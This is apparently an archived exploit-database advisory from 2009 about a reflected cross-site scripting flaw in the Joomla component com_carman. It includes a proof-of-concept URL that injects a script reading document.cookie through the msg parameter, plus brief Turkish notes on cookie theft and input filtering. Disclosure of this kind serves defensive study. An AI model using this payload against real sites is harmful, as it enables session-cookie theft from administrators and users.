[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_carman Cross Site Scripting Vulnerability
# Published : 2009-12-24
# Author : Fl0riX
# Previous Title : Simple PHP Guestbook Remote Admin Access Exploit
# Next Title : Joomla Component com_jeemaarticlecollection SQL injection


< ------------------- header data start ------------------- >

#####################################################################
       Joomla Component com_carman Cross Site Scripting Vulnerability                                          
####################################################################

# author        :Fl0riX
# Greetz          : BARCOD3 , Septemb0x, Deep-Power,DreamPower,Pyske,3kb3r
# Name        : com_carman

# Bug Type       : Cross Site Scripting

# Infection          : Y&#65533;netici ve User cookie&#65533;leri &#65533;al&#65533;nabilir.

# Bug Fix Advice     : Zararl&#65533; karakterler filtrelenmelidir.


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

/index.php?option=com_carman&msg="><script>alert(document.cookie)</script>

< -- bug code end of -- >